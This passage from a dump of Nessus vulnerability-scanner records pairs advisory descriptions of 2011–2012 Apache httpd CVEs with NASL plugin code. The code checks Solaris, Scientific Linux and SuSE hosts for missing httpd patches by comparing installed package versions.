(CVE-2011-4317)\n\n - scoreboard.c in the Apache HTTP Server 2.2.21 and\n earlier might allow local users to cause a denial of\n service (daemon crash during shutdown) or possibly have\n unspecified other impact by modifying a certain type\n field within a scoreboard shared memory segment, leading\n to an invalid call to the free function. (CVE-2012-0031)\n\n - protocol.c in the Apache HTTP Server 2.2.x through\n 2.2.21 does not properly restrict header information\n during construction of Bad Request (aka 400) error\n documents, which allows remote attackers to obtain the\n values of HTTPOnly cookies via vectors involving a (1)\n long or (2) malformed header in conjunction with crafted\n web script. (CVE-2012-0053)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-3607-buffer-overflow-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40ebbd75\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4317-improper-input-validation-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed03d708\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-0031-resource-management-errors-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cc400cae\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-0053-information-disclosure-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90df36e7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:apache\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^apache-2\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : apache\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"apache\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:51:07", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a previous update) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL5.x i386/x86_64 (20120221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120221_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61261);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x i386/x86_64 (20120221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=874\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?99d5fd4b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-63.sl5.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:02", "description": "This update fixes the following issues :\n\n - Denial of Service via special requests in mod_proxy_ajp.\n (CVE-2012-4557)\n\n - improper LD_LIBRARY_PATH handling. (CVE-2012-0883)\n\n - filename escaping problem Additionally, some non-security bugs have been fixed:. (CVE-2012-2687)\n\n - ignore case when checking against SNI server names.\n [bnc#798733]\n\n - httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to reflect the upstream changes. This will prevent the 'Invalid URI in request OPTIONS *' messages in the error log. [bnc#722545]\n\n - new sysconfig variable APACHE_DISABLE_SSL_COMPRESSION;\n if set to on, OPENSSL_NO_DEFAULT_ZLIB will be inherited to the apache process; openssl will then transparently disable compression. This change affects start script and sysconfig fillup template. Default is on, SSL compression disabled. Please see mod_deflate for compressed transfer at http layer. [bnc#782956]", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "SuSE 11.2 Security Update : Apache (SAT Patch Number 7409)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0883", "CVE-2012-2687", "CVE-2012-4557"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-130225.NASL", "href": "https://www.tenable.com/plugins/nessus/65023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65023);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0883\", \"CVE-2012-2687\", \"CVE-2012-4557\");\n\n script_name(english:\"SuSE 11.2 Security Update : Apache (SAT Patch Number 7409)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following issues :\n\n - Denial of Service via special requests in mod_proxy_ajp.\n (CVE-2012-4557)\n\n - improper LD_LIBRARY_PATH handling. (CVE-2012-0883)\n\n - filename escaping problem Additionally, some\n non-security bugs have been fixed:. (CVE-2012-2687)\n\n - ignore case when checking against SNI server names.\n [bnc#798733]\n\n - httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff\n reworked to reflect the upstream changes. This will\n prevent the 'Invalid URI in request OPTIONS *' messages\n in the error log. [bnc#722545]\n\n - new sysconfig variable APACHE_DISABLE_SSL_COMPRESSION;\n if set to on, OPENSSL_NO_DEFAULT_ZLIB will be inherited\n to the apache process; openssl will then transparently\n disable compression. This change affects start script\n and sysconfig fillup template. Default is on, SSL\n compression disabled. Please see mod_deflate for\n compressed transfer at http layer. [bnc#782956]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=774045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=782956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=788121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=793004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0021.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2687.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-4557.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7409.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-doc-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-example-pages-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-prefork-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-utils-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-worker-2.2.12-1.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:48:15", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a previous update) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64 (20120213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120213_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61245);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2220\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ddbd264\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:39:12", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a 